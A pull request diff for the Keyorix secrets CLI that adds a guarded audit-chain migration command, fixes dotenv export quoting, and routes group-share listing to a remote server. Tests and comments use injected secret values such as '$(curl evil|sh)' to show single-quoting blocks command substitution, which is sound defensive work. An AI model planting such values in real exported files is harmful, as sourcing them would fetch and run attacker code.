### PR TITLE
fix(security): batch of 7 adversarial-review follow-up fixes

### DIFF
--- a/internal/cli/audit/audit.go
+++ b/internal/cli/audit/audit.go
@@ -58,6 +58,8 @@ var (
 	searchUntil        string
 	searchLimit        int
 	searchOffset       int
+
+	flagMigrateConfirm bool
 )
 
 func init() {
@@ -90,7 +92,10 @@ func init() {
 	searchCmd.Flags().IntVar(&searchLimit, "limit", 100, "Max results (1–1000)")
 	searchCmd.Flags().IntVar(&searchOffset, "offset", 0, "Pagination offset")
 
-	AuditCmd.AddCommand(verifyCmd, exportCmd, checkpointCmd, logsCmd, searchCmd)
+	migrateChainCmd.Flags().BoolVar(&flagMigrateConfirm, "confirm", false,
+		"Apply the migration for real. Without this flag, the command only previews what would change — nothing is written.")
+
+	AuditCmd.AddCommand(verifyCmd, exportCmd, checkpointCmd, logsCmd, searchCmd, migrateChainCmd)
 }
 
 func client() (*common.RemoteClient, error) {
@@ -358,6 +363,73 @@ verify (broken, or a prior signed checkpoint proves a truncation).`,
 			if !out.AnchorTrustRootConfigured {
 				fmt.Println("  anchor verified: NO — no TSA trust root (ca_cert_path) is configured; this token was recorded but never checked against any root of trust")
 			}
+		}
+		return nil
+	},
+}
+
+// migrateChainResult mirrors the /audit/migrate-chain-encoding payload.
+type migrateChainResult struct {
+	DryRun               bool   `json:"dry_run"`
+	RowsMigrated         int64  `json:"rows_migrated"`
+	UnchainedRowsSkipped int64  `json:"unchained_rows_skipped"`
+	HeadID               uint   `json:"head_id"`
+	HeadHash             string `json:"head_hash"`
+	AnchorRowID          uint   `json:"anchor_row_id,omitempty"`
+	AnchorNewEntryHash   string `json:"anchor_new_entry_hash,omitempty"`
+}
+
+var migrateChainCmd = &cobra.Command{
+	Use:   "migrate-chain-encoding",
+	Short: "One-time re-derivation of the audit hash chain under the current encoding",
+	Long: `Re-derives entry_hash/prev_hash for every chained audit_events row under the
+server's current hash encoding. This closes a breaking hash-format change: any
+deployment with pre-existing chained audit rows will otherwise see 'audit verify'
+report the chain broken starting at the first pre-upgrade row, indistinguishable
+from tampering.
+
+SAFETY: without --confirm this only PREVIEWS what would change — nothing is
+written. Review the preview's row count before re-running with --confirm.
+
+This rewrites the tamper-evidence dataset itself. Before running with --confirm:
+  - Stop all other server instances (or otherwise ensure nothing else is writing
+    audit events) for the duration of the run — a concurrently appended event
+    can be hashed against a partially-migrated chain otherwise.
+  - Prefer running during a maintenance window.
+  - Consider taking a database backup first.
+
+Requires system.write (same privilege bar as 'audit checkpoint').`,
+	SilenceUsage: true,
+	RunE: func(_ *cobra.Command, _ []string) error {
+		c, err := client()
+		if err != nil {
+			return err
+		}
+		path := "/api/v1/audit/migrate-chain-encoding?dry_run=true"
+		if flagMigrateConfirm {
+			path = "/api/v1/audit/migrate-chain-encoding?dry_run=false"
+		}
+		var out migrateChainResult
+		if err := c.Post(context.Background(), path, nil, &out); err != nil {
+			return err
+		}
+
+		if out.DryRun {
+			fmt.Println("DRY RUN — nothing was written. Re-run with --confirm to apply.")
+		} else {
+			fmt.Println("Audit chain encoding migration applied:")
+		}
+		fmt.Printf("  rows migrated:          %d\n", out.RowsMigrated)
+		fmt.Printf("  unchained rows skipped: %d\n", out.UnchainedRowsSkipped)
+		fmt.Printf("  new head id:            %d\n", out.HeadID)
+		fmt.Printf("  new head hash:          %s\n", out.HeadHash)
+		if out.AnchorRowID != 0 {
+			fmt.Printf("  retention anchor row:   %d (re-signed with the migrated entry_hash)\n", out.AnchorRowID)
+		}
+		if out.DryRun {
+			fmt.Println("\nRun 'keyorix audit migrate-chain-encoding --confirm' to apply.")
+		} else {
+			fmt.Println("\nRun 'keyorix audit verify' to confirm the chain now verifies end to end.")
 		}
 		return nil
 	},

--- a/internal/cli/audit/audit_migrate_chain_test.go
+++ b/internal/cli/audit/audit_migrate_chain_test.go
@@ -1,0 +1,70 @@
+package audit
+
+import (
+	"bytes"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+func TestMigrateChainEncoding_CommandWiring(t *testing.T) {
+	names := map[string]bool{}
+	for _, sub := range AuditCmd.Commands() {
+		names[sub.Name()] = true
+	}
+	assert.True(t, names["migrate-chain-encoding"], "missing subcommand migrate-chain-encoding")
+	assert.NotNil(t, migrateChainCmd.Flags().Lookup("confirm"), "migrate-chain-encoding missing --confirm")
+}
+
+func TestMigrateChainEncoding_DefaultIsDryRun(t *testing.T) {
+	var gotMethod, gotPath, gotQuery string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotMethod, gotPath, gotQuery = r.Method, r.URL.Path, r.URL.RawQuery
+		_, _ = w.Write([]byte(`{"data":{"dry_run":true,"rows_migrated":42,"unchained_rows_skipped":3,"head_id":45,"head_hash":"abc123"}}`))
+	}))
+	defer srv.Close()
+	setRemote(t, srv.URL)
+
+	var out bytes.Buffer
+	migrateChainCmd.SetOut(&out)
+	flagMigrateConfirm = false
+	require.NoError(t, migrateChainCmd.RunE(migrateChainCmd, nil))
+
+	assert.Equal(t, http.MethodPost, gotMethod)
+	assert.Equal(t, "/api/v1/audit/migrate-chain-encoding", gotPath)
+	assert.Equal(t, "dry_run=true", gotQuery, "without --confirm the call must request the safe dry-run path, never omit dry_run")
+}
+
+func TestMigrateChainEncoding_ConfirmAppliesForReal(t *testing.T) {
+	var gotQuery string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotQuery = r.URL.RawQuery
+		_, _ = w.Write([]byte(`{"data":{"dry_run":false,"rows_migrated":42,"unchained_rows_skipped":3,"head_id":45,"head_hash":"abc123","anchor_row_id":9,"anchor_new_entry_hash":"def456"}}`))
+	}))
+	defer srv.Close()
+	setRemote(t, srv.URL)
+
+	var out bytes.Buffer
+	migrateChainCmd.SetOut(&out)
+	flagMigrateConfirm = true
+	defer func() { flagMigrateConfirm = false }()
+	require.NoError(t, migrateChainCmd.RunE(migrateChainCmd, nil))
+
+	assert.Equal(t, "dry_run=false", gotQuery, "--confirm must explicitly opt out of the safe default")
+}
+
+func TestMigrateChainEncoding_ServerErrorSurfaces(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusForbidden)
+		_, _ = w.Write([]byte(`{"error":"insufficient permissions"}`))
+	}))
+	defer srv.Close()
+	setRemote(t, srv.URL)
+
+	flagMigrateConfirm = false
+	err := migrateChainCmd.RunE(migrateChainCmd, nil)
+	require.Error(t, err)
+}

--- a/internal/cli/audit/audit_test.go
+++ b/internal/cli/audit/audit_test.go
@@ -16,7 +16,7 @@ func TestCommandWiring(t *testing.T) {
 	for _, sub := range AuditCmd.Commands() {
 		names[sub.Name()] = true
 	}
-	for _, want := range []string{"verify", "export", "checkpoint", "logs"} {
+	for _, want := range []string{"verify", "export", "checkpoint", "logs", "migrate-chain-encoding"} {
 		assert.True(t, names[want], "missing subcommand %q", want)
 	}
 	assert.NotNil(t, verifyCmd.Flags().Lookup("json"), "verify missing --json")

--- a/internal/cli/secret/export.go
+++ b/internal/cli/secret/export.go
@@ -6,6 +6,7 @@ import (
 	"fmt"
 	"io"
 	"os"
+	"regexp"
 	"strings"
 	"syscall"
 	"time"
@@ -222,6 +223,26 @@ func fetchSecretValues(ctx context.Context, rc *common.RemoteClient, list []stru
 // "FOO\nINJECTED=evil" inject an extra, attacker-controlled KEY=VALUE line into an
 // artifact downstream tooling (docker run --env-file, CI --env-file) treats as fully
 // trusted. Refuse the export instead of silently producing an unsafe file.
+// dotenvPlainSafe matches values that need no quoting at all in the emitted
+// dotenv file: alnum plus a small allowlist of punctuation that's common in
+// real secret values (paths, URLs, timestamps) and carries no shell meaning.
+// Mirrors integrations/github-action/entrypoint.sh's write_output_file, which
+// uses the identical allowlist for the identical reason.
+var dotenvPlainSafe = regexp.MustCompile(`^[A-Za-z0-9_.,:/@+-]*$`)
+
+// writeDotenv emits KEY=VALUE lines. This file's own docs (and every dotenv
+// consumer convention, e.g. `set -a && . .env && set +a`) treat sourcing the
+// output with a shell as a real, documented consumption path, not a
+// hypothetical misuse. Any value outside dotenvPlainSafe is wrapped in SINGLE
+// quotes — the only POSIX-shell quoting form that suppresses ALL expansion
+// (command substitution $()/backtick, parameter/arithmetic expansion,
+// globbing, tilde expansion) — with only the literal single-quote character
+// escaped via the standard close-escape-reopen idiom ('\”). A prior revision
+// double-quoted non-plain values, which does NOT suppress $()/backtick
+// command substitution: a secret value containing e.g. `$(curl evil|sh)`
+// survived into the file unneutralized and would execute if later sourced
+// (adversarial-review integrations-github-action.json#2, the sibling gap this
+// closes — see entrypoint.sh's write_output_file for the bash precedent).
 func writeDotenv(w io.Writer, secrets []exportedSecret) error {
 	for _, s := range secrets {
 		if strings.ContainsAny(s.Name, "\r\n") {
@@ -231,8 +252,8 @@ func writeDotenv(w io.Writer, secrets []exportedSecret) error {
 	fmt.Fprintf(w, "# Exported by Keyorix — %s\n", time.Now().Format("2006-01-02")) //nolint:errcheck
 	for _, s := range secrets {
 		val := s.Value
-		if strings.ContainsAny(val, " \t\n\"'=\\") {
-			val = `"` + strings.ReplaceAll(strings.ReplaceAll(val, `\`, `\\`), `"`, `\"`) + `"`
+		if !dotenvPlainSafe.MatchString(val) {
+			val = "'" + strings.ReplaceAll(val, `'`, `'\''`) + "'"
 		}
 		fmt.Fprintf(w, "%s=%s\n", s.Name, val) //nolint:errcheck
 	}

--- a/internal/cli/secret/export_test.go
+++ b/internal/cli/secret/export_test.go
@@ -3,9 +3,11 @@ package secret
 import (
 	"bytes"
 	"context"
+	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"os"
+	"os/exec"
 	"path/filepath"
 	"runtime"
 	"strings"
@@ -98,7 +100,8 @@ func TestWriteDotenv_RejectsCarriageReturnInSecretName(t *testing.T) {
 }
 
 // The ordinary case — no newline in any name — must still produce the expected
-// KEY=VALUE lines, with the value quote-escaped exactly as before.
+// KEY=VALUE lines, with the value single-quote-escaped (not double-quoted — see
+// writeDotenv's doc comment for why).
 func TestWriteDotenv_NormalNamesUnaffected(t *testing.T) {
 	var buf bytes.Buffer
 	secrets := []exportedSecret{
@@ -107,8 +110,58 @@ func TestWriteDotenv_NormalNamesUnaffected(t *testing.T) {
 	}
 	require.NoError(t, writeDotenv(&buf, secrets))
 	out := buf.String()
-	assert.Contains(t, out, `DB_PASSWORD="hello world"`)
+	assert.Contains(t, out, `DB_PASSWORD='hello world'`)
 	assert.Contains(t, out, "API_KEY=plain")
+}
+
+// #G-followup: a value containing a command-substitution payload must be
+// single-quoted, which suppresses $()/backtick expansion entirely — unlike the
+// previous double-quoting, which did NOT suppress it, so a value like
+// `$(curl evil|sh)` survived unneutralized into the exported file and would
+// execute if a caller later sourced it as documented (e.g. `set -a && . .env
+// && set +a`). Mirrors integrations/github-action/entrypoint.sh's
+// write_output_file, which was fixed for the identical gap
+// (adversarial-review integrations-github-action.json#2).
+func TestWriteDotenv_NeutralizesCommandSubstitution(t *testing.T) {
+	var buf bytes.Buffer
+	secrets := []exportedSecret{
+		{ID: 1, Name: "PAYLOAD", Value: "$(curl evil|sh)"},
+		{ID: 2, Name: "BACKTICK", Value: "`whoami`"},
+	}
+	require.NoError(t, writeDotenv(&buf, secrets))
+	out := buf.String()
+	assert.Contains(t, out, `PAYLOAD='$(curl evil|sh)'`)
+	assert.Contains(t, out, "BACKTICK='`whoami`'")
+
+	// Prove the neutralization actually holds under a real shell: source the
+	// file and confirm PAYLOAD/BACKTICK end up as the literal strings, not
+	// executed — the exact scenario this fix closes.
+	dir := t.TempDir()
+	envFile := filepath.Join(dir, "test.env")
+	require.NoError(t, os.WriteFile(envFile, buf.Bytes(), 0o600))
+	script := fmt.Sprintf("set -a; . %q; set +a; printf '%%s\\n%%s\\n' \"$PAYLOAD\" \"$BACKTICK\"", envFile)
+	cmdOut, err := exec.Command("bash", "-c", script).CombinedOutput() // #nosec G204 -- test-controlled fixed script string
+	require.NoError(t, err)
+	assert.Equal(t, "$(curl evil|sh)\n`whoami`\n", string(cmdOut),
+		"sourcing the exported file must yield the literal payload strings, not execute them")
+}
+
+// A value made entirely of the plain-safe allowlist charset is left unquoted,
+// matching write_output_file's identical optimization.
+func TestWriteDotenv_PlainSafeValueUnquoted(t *testing.T) {
+	var buf bytes.Buffer
+	secrets := []exportedSecret{{ID: 1, Name: "URL", Value: "https://example.com/a/b_c.d-e:f@g+1,2"}}
+	require.NoError(t, writeDotenv(&buf, secrets))
+	assert.Contains(t, buf.String(), "URL=https://example.com/a/b_c.d-e:f@g+1,2\n")
+}
+
+// A value containing a literal single quote must have it escaped via the
+// close-escape-reopen idiom, not left to terminate the quoted string early.
+func TestWriteDotenv_EscapesEmbeddedSingleQuote(t *testing.T) {
+	var buf bytes.Buffer
+	secrets := []exportedSecret{{ID: 1, Name: "K", Value: "it's a secret"}}
+	require.NoError(t, writeDotenv(&buf, secrets))
+	assert.Contains(t, buf.String(), `K='it'\''s a secret'`)
 }
 
 // TestWriteSecrets_JSONFormat verifies that writeSecrets dispatches to JSON correctly.

--- a/internal/cli/secret/secret_s8_test.go
+++ b/internal/cli/secret/secret_s8_test.go
@@ -1820,7 +1820,9 @@ func TestWriteDotenv_QuotedValue_S8(t *testing.T) {
 	var buf bytes.Buffer
 	err := writeDotenv(&buf, secrets)
 	require.NoError(t, err)
-	assert.Contains(t, buf.String(), `"val with spaces"`)
+	// Single-quoted, not double-quoted — see writeDotenv's doc comment: double
+	// quotes don't suppress $()/backtick command substitution.
+	assert.Contains(t, buf.String(), `'val with spaces'`)
 }
 
 // ─── runImport: remote path with doImport (skip-existing) ────────────────────

--- a/internal/cli/share/group_shares.go
+++ b/internal/cli/share/group_shares.go
@@ -30,15 +30,10 @@ func init() {
 }
 
 func runGroupShares(cmd *cobra.Command, args []string) error {
-	// KNOWN GAP (tracked, not fixed here): unlike every other command in this
-	// package, this has no `if rc, ok := common.NewRemoteClient(); ok { ... }`
-	// branch — it always reads local embedded storage, silently ignoring a
-	// connected server (#G66). #G10 (below) closed the OTHER half of this: the
-	// core function now self-authorizes, so a future remote endpoint can safely
-	// expose it without shipping a new unauthenticated-scope disclosure surface.
-	// Adding that endpoint (and this command's remote-client branch) is still
-	// out of scope here — it's #G66's fix, not #G10's.
-	//
+	if rc, ok := common.NewRemoteClient(); ok {
+		return runGroupSharesRemote(rc, groupSharesGroupID)
+	}
+
 	// Obtain storage via the factory so the backend honors cfg.Storage.Type (ADR-049).
 	st, err := common.InitializeStorage()
 	if err != nil {

--- a/internal/cli/share/remote.go
+++ b/internal/cli/share/remote.go
@@ -76,6 +76,32 @@ func runListRemote(rc *common.RemoteClient, secretID uint) error {
 	return nil
 }
 
+// runGroupSharesRemote lists shares granted TO a group via
+// GET /api/v1/groups/{id}/shares (#G66 — the embedded path previously ran
+// unconditionally, silently ignoring a connected server; there was no
+// remote-mode branch or server endpoint for this command at all).
+func runGroupSharesRemote(rc *common.RemoteClient, groupID uint) error {
+	var resp struct {
+		Shares []models.ShareRecord `json:"shares"`
+	}
+	if err := rc.Get(context.Background(), fmt.Sprintf("/api/v1/groups/%d/shares", groupID), &resp); err != nil {
+		return fmt.Errorf("failed to list group shares: %w", err)
+	}
+	if len(resp.Shares) == 0 {
+		fmt.Println("No shares found for this group.")
+		return nil
+	}
+	w := tabwriter.NewWriter(os.Stdout, 0, 0, 2, ' ', 0)
+	fmt.Fprintln(w, "ID\tSECRET ID\tOWNER ID\tGROUP ID\tPERMISSION\tCREATED AT") //nolint:errcheck
+	for _, share := range resp.Shares {
+		fmt.Fprintf(w, "%d\t%d\t%d\t%d\t%s\t%s\n", //nolint:errcheck
+			share.ID, share.SecretID, share.OwnerID, share.RecipientID,
+			share.Permission, share.CreatedAt.Format("2006-01-02 15:04:05"))
+	}
+	_ = w.Flush() // #nosec G104
+	return nil
+}
+
 func runRevokeRemote(rc *common.RemoteClient, shareID uint) error {
 	if err := rc.Delete(context.Background(), fmt.Sprintf("/api/v1/shares/%d", shareID)); err != nil {
 		return fmt.Errorf("failed to revoke share: %w", err)

--- a/internal/cli/share/share_remote_test.go
+++ b/internal/cli/share/share_remote_test.go
@@ -88,6 +88,58 @@ func TestRunSharedSecrets_Remote_RoutesThroughRemoteClient(t *testing.T) {
 	assert.Equal(t, "/api/v1/shared-secrets", gotPath)
 }
 
+func TestRunGroupSharesRemote_EmptyResponse(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		_, _ = w.Write([]byte(`{"data":{"shares":[]}}`))
+	}))
+	defer srv.Close()
+	t.Setenv("KEYORIX_SERVER", srv.URL)
+	t.Setenv("KEYORIX_TOKEN", "test-token")
+	rc, ok := common.NewRemoteClient()
+	require.True(t, ok)
+
+	require.NoError(t, runGroupSharesRemote(rc, 7))
+}
+
+func TestRunGroupSharesRemote_WithResults(t *testing.T) {
+	var gotPath string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotPath = r.URL.Path
+		_, _ = w.Write([]byte(`{"data":{"shares":[
+			{"ID":1,"SecretID":5,"OwnerID":1,"RecipientID":7,"IsGroup":true,"Permission":"read","CreatedAt":"2026-06-01T10:00:00Z"}
+		]}}`))
+	}))
+	defer srv.Close()
+	t.Setenv("KEYORIX_SERVER", srv.URL)
+	t.Setenv("KEYORIX_TOKEN", "test-token")
+	rc, ok := common.NewRemoteClient()
+	require.True(t, ok)
+
+	require.NoError(t, runGroupSharesRemote(rc, 7))
+	assert.Equal(t, "/api/v1/groups/7/shares", gotPath)
+}
+
+// TestRunGroupShares_Remote_RoutesThroughRemoteClient is the regression test
+// for #G66: previously runGroupShares had no remote-client branch at all and
+// always read local embedded storage, silently ignoring a connected server.
+func TestRunGroupShares_Remote_RoutesThroughRemoteClient(t *testing.T) {
+	var gotPath string
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotPath = r.URL.Path
+		_, _ = w.Write([]byte(`{"data":{"shares":[]}}`))
+	}))
+	defer srv.Close()
+	t.Setenv("KEYORIX_SERVER", srv.URL)
+	t.Setenv("KEYORIX_TOKEN", "test-token")
+
+	origID := groupSharesGroupID
+	defer func() { groupSharesGroupID = origID }()
+	groupSharesGroupID = 11
+
+	require.NoError(t, runGroupShares(nil, nil))
+	assert.Equal(t, "/api/v1/groups/11/shares", gotPath)
+}
+
 func TestRunUpdate_PermissionValidation(t *testing.T) {
 	origPerm, origID := updatePermission, updateShareID
 	defer func() { updatePermission = origPerm; updateShareID = origID }()

--- a/internal/cli/share/share_s2_test.go
+++ b/internal/cli/share/share_s2_test.go
@@ -83,6 +83,8 @@ func TestRunGroupShares_LocalModeStorageError(t *testing.T) {
 	t.Chdir(t.TempDir())
 	t.Setenv("KEYORIX_SERVER", "")
 	t.Setenv("KEYORIX_TOKEN", "")
+	// #G66: isolate from any real ~/.keyorix/cli.yaml so this stays local-mode.
+	t.Setenv("XDG_CONFIG_HOME", t.TempDir())
 	origID := groupSharesGroupID
 	defer func() { groupSharesGroupID = origID }()
 	groupSharesGroupID = 1
@@ -189,6 +191,8 @@ func TestRunGroupShares_EmptyResult(t *testing.T) {
 	t.Chdir(t.TempDir())
 	t.Setenv("KEYORIX_SERVER", "")
 	t.Setenv("KEYORIX_TOKEN", "")
+	// #G66: isolate from any real ~/.keyorix/cli.yaml so this stays local-mode.
+	t.Setenv("XDG_CONFIG_HOME", t.TempDir())
 	orig := groupSharesGroupID
 	defer func() { groupSharesGroupID = orig }()
 	groupSharesGroupID = 1

--- a/internal/cli/share/share_s3_test.go
+++ b/internal/cli/share/share_s3_test.go
@@ -332,6 +332,10 @@ func TestRunGroupShares_PrintsTable(t *testing.T) {
 	t.Chdir(dir)
 	t.Setenv("KEYORIX_SERVER", "")
 	t.Setenv("KEYORIX_TOKEN", "")
+	// #G66: runGroupShares now has a remote-client branch like every other
+	// share command — isolate it from any real ~/.keyorix/cli.yaml on the
+	// machine running the test, so this stays a local-mode test.
+	t.Setenv("XDG_CONFIG_HOME", t.TempDir())
 
 	svc := openShareCore(t)
 	ownerID, secretID, projID := seedShareData(t, svc)

--- a/internal/core/audit_chain_migrate.go
+++ b/internal/core/audit_chain_migrate.go
@@ -1,0 +1,64 @@
+// audit_chain_migrate.go — one-time re-encoding of the audit hash chain
+// (ADR-029) after computeAuditEntryHash's length-prefixed-encoding fix, a
+// breaking hash-format change (see local_audit_chain.go's doc comment for
+// why the old NUL-delimited encoding was non-injective and had to change).
+//
+// This is deliberately an operator-triggered maintenance operation, not
+// something that runs automatically at startup or on a schedule: rewriting
+// every historical row of the one dataset whose entire purpose is tamper
+// evidence is exactly the kind of change that should happen with an operator
+// watching, during a maintenance window, not silently on the next deploy.
+package core
+
+import (
+	"context"
+	"fmt"
+
+	"github.com/keyorixhq/keyorix/internal/core/storage"
+)
+
+// MigrateAuditChainEncoding re-derives entry_hash/prev_hash for every chained
+// audit_events row under the current hash encoding. See
+// storage.Storage.MigrateAuditChainEncoding's doc for the full contract,
+// including why the caller MUST ensure no other process is concurrently
+// writing to this database's audit_events table for the duration of a
+// non-dry-run call (stop the server, or run during a maintenance window —
+// this call's own transaction only protects against concurrent writes
+// through this SAME storage backend's LogAuditEvent path).
+//
+// dryRun computes and returns the result WITHOUT persisting anything.
+//
+// On a real (non-dry-run) run: if a retention-anchored row was migrated, the
+// anchor is re-signed and persisted under the row's newly computed
+// entry_hash (its PrevHash is unchanged — it represents an already-purged
+// predecessor that cannot be recomputed under any encoding). A new audit
+// event recording the migration is then appended, chained under the new
+// encoding — becoming the chain's fresh, self-consistent head.
+func (c *KeyorixCore) MigrateAuditChainEncoding(ctx context.Context, actorID uint, dryRun bool) (*storage.AuditChainMigrationResult, error) {
+	anchor, err := c.loadAuditRetentionAnchor(ctx)
+	if err != nil {
+		return nil, fmt.Errorf("failed to load audit chain re-anchor: %w", err)
+	}
+
+	result, err := c.storage.MigrateAuditChainEncoding(ctx, dryRun, anchor)
+	if err != nil {
+		return nil, fmt.Errorf("failed to migrate audit chain encoding: %w", err)
+	}
+	if dryRun {
+		return result, nil
+	}
+
+	if result.AnchorRowID != 0 {
+		if err := c.persistAuditRetentionAnchor(ctx, c.storage, result.AnchorRowID, anchor.PrevHash, result.AnchorNewEntryHash); err != nil {
+			return nil, fmt.Errorf(
+				"audit chain rows were migrated successfully, but re-signing the retention anchor failed (%w) — "+
+					"re-run the migration to retry; row hashes are already correct and re-running is safe", err)
+		}
+	}
+
+	c.writeAuditEventFull(ctx, "audit.chain_migrated", &actorID, nil, nil, "",
+		fmt.Sprintf("audit hash-chain re-encoded: %d rows migrated, %d unchained legacy rows skipped, new head id %d",
+			result.RowsMigrated, result.UnchainedRowsSkipped, result.HeadID))
+
+	return result, nil
+}

--- a/internal/core/audit_chain_migrate_test.go
+++ b/internal/core/audit_chain_migrate_test.go
@@ -1,0 +1,124 @@
+// audit_chain_migrate_test.go — regression coverage for
+// KeyorixCore.MigrateAuditChainEncoding (ADR-029 hash-format migration).
+package core
+
+import (
+	"context"
+	"testing"
+
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+func TestMigrateAuditChainEncoding_Core_AppliesAndVerifiesAfterward(t *testing.T) {
+	ctx := context.Background()
+	c, db, fixed := newReanchorTestCore(t)
+
+	e1 := logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -3))
+	e2 := logChainedEvent(t, c, "secret.updated", fixed.AddDate(0, 0, -2))
+	e3 := logChainedEvent(t, c, "secret.deleted", fixed.AddDate(0, 0, -1))
+
+	// Simulate a legacy-encoded pre-existing chain by rewriting the stored
+	// hashes directly, matching the storage-layer test's approach.
+	require.NoError(t, db.Model(&models.AuditEvent{}).Where("id = ?", e1.ID).
+		Updates(map[string]interface{}{"entry_hash": "legacy-" + e1.EntryHash[:16]}).Error)
+	var reload2, reload3 models.AuditEvent
+	require.NoError(t, db.First(&reload2, e2.ID).Error)
+	require.NoError(t, db.First(&reload3, e3.ID).Error)
+	require.NoError(t, db.Model(&models.AuditEvent{}).Where("id = ?", e2.ID).
+		Updates(map[string]interface{}{"prev_hash": "legacy-" + e1.EntryHash[:16], "entry_hash": "legacy-" + e2.EntryHash[:16]}).Error)
+	require.NoError(t, db.Model(&models.AuditEvent{}).Where("id = ?", e3.ID).
+		Updates(map[string]interface{}{"prev_hash": "legacy-" + e2.EntryHash[:16], "entry_hash": "legacy-" + e3.EntryHash[:16]}).Error)
+
+	v, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	assert.False(t, v.Valid, "sanity: legacy-encoded rows must not verify before migration")
+
+	result, err := c.MigrateAuditChainEncoding(ctx, 1, false)
+	require.NoError(t, err)
+	assert.Equal(t, int64(3), result.RowsMigrated)
+	assert.NotEmpty(t, result.HeadHash)
+
+	v2, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	assert.True(t, v2.Valid, "chain must verify after a real migration run: %s", v2.Reason)
+
+	// A completion event was appended, chained under the new encoding —
+	// becoming the chain's fresh head.
+	var head models.AuditEvent
+	require.NoError(t, db.Order("id DESC").First(&head).Error)
+	assert.Equal(t, "audit.chain_migrated", head.EventType)
+	assert.Equal(t, head.ID, v2.HeadID, "the completion event itself must verify as the new head")
+}
+
+func TestMigrateAuditChainEncoding_Core_DryRunPersistsNothing(t *testing.T) {
+	ctx := context.Background()
+	c, db, fixed := newReanchorTestCore(t)
+
+	e1 := logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -1))
+	require.NoError(t, db.Model(&models.AuditEvent{}).Where("id = ?", e1.ID).
+		Updates(map[string]interface{}{"entry_hash": "legacy-" + e1.EntryHash[:16]}).Error)
+
+	var before models.AuditEvent
+	require.NoError(t, db.First(&before, e1.ID).Error)
+
+	result, err := c.MigrateAuditChainEncoding(ctx, 1, true)
+	require.NoError(t, err)
+	assert.Equal(t, int64(1), result.RowsMigrated, "dry run still reports what would change")
+
+	var after models.AuditEvent
+	require.NoError(t, db.First(&after, e1.ID).Error)
+	assert.Equal(t, before.EntryHash, after.EntryHash, "dry run must not persist row changes")
+
+	// No completion event is appended on a dry run — nothing to record.
+	var count int64
+	require.NoError(t, db.Model(&models.AuditEvent{}).Where("event_type = ?", "audit.chain_migrated").Count(&count).Error)
+	assert.Equal(t, int64(0), count, "a dry run must not append a completion audit event")
+}
+
+// TestMigrateAuditChainEncoding_Core_ReSignsAnchorAfterPurge covers the
+// interaction with a preceding retention purge: the earliest surviving row
+// carries an anchor (its real predecessor was purged). A real migration run
+// must re-sign that anchor with the row's newly computed hash so
+// VerifyAuditChain (which authenticates the anchor against the signing key)
+// keeps accepting it after the migration.
+func TestMigrateAuditChainEncoding_Core_ReSignsAnchorAfterPurge(t *testing.T) {
+	ctx := context.Background()
+	c, db, fixed := newReanchorTestCore(t)
+
+	for i := 0; i < 3; i++ {
+		logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -(40+i)))
+	}
+	for i := 0; i < 2; i++ {
+		logChainedEvent(t, c, "secret.updated", fixed.AddDate(0, 0, -1))
+	}
+
+	_, err := c.PurgeAuditLogs(ctx, AuditLogRetentionConfig{RetentionDays: 30})
+	require.NoError(t, err)
+
+	v, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	require.True(t, v.Valid, "sanity: purge alone must not break verification")
+
+	// Simulate the anchored (earliest surviving) row being legacy-encoded:
+	// rewrite its entry_hash directly (its prev_hash — the anchor's PrevHash —
+	// must stay untouched, since it represents an already-purged predecessor).
+	var earliest models.AuditEvent
+	require.NoError(t, db.Where("event_type != ?", "system.audit_purge").Order("id ASC").First(&earliest).Error)
+	require.NoError(t, db.Model(&models.AuditEvent{}).Where("id = ?", earliest.ID).
+		Updates(map[string]interface{}{"entry_hash": "legacy-" + earliest.EntryHash[:16]}).Error)
+
+	v2, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	assert.False(t, v2.Valid, "sanity: legacy-encoded anchored row must not verify before migration")
+
+	result, err := c.MigrateAuditChainEncoding(ctx, 1, false)
+	require.NoError(t, err)
+	require.Equal(t, earliest.ID, result.AnchorRowID, "the anchored row must be reported for re-signing")
+	assert.NotEmpty(t, result.AnchorNewEntryHash)
+
+	v3, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	assert.True(t, v3.Valid, "chain must verify after the anchor is re-signed by the migration: %s", v3.Reason)
+}

--- a/internal/core/classify_dynamic_test.go
+++ b/internal/core/classify_dynamic_test.go
@@ -15,7 +15,7 @@ func makeDynConfig(t *testing.T, c *KeyorixCore, name, classification string) ui
 	cfg, err := c.CreateDynamicSecretConfig(context.Background(), &CreateDynamicSecretConfigRequest{
 		Name:           name,
 		ProjectID:      1,
-		EnvironmentID:  1,
+		EnvironmentID:  2,
 		BackendType:    "postgres",
 		AdminDSN:       "postgres://admin:pw@db.example.com/db",
 		Classification: classification,
@@ -36,7 +36,7 @@ func TestCreateDynamicSecretConfig_WithClassification(t *testing.T) {
 
 	// Invalid level is rejected at create.
 	_, err = c.CreateDynamicSecretConfig(context.Background(), &CreateDynamicSecretConfigRequest{
-		Name: "bad", ProjectID: 1, EnvironmentID: 1, BackendType: "postgres",
+		Name: "bad", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres",
 		AdminDSN: "postgres://x", Classification: "top-secret", CreatedBy: "admin",
 		ActorID: testAdminActorID,
 	})

--- a/internal/core/core_s24_test.go
+++ b/internal/core/core_s24_test.go
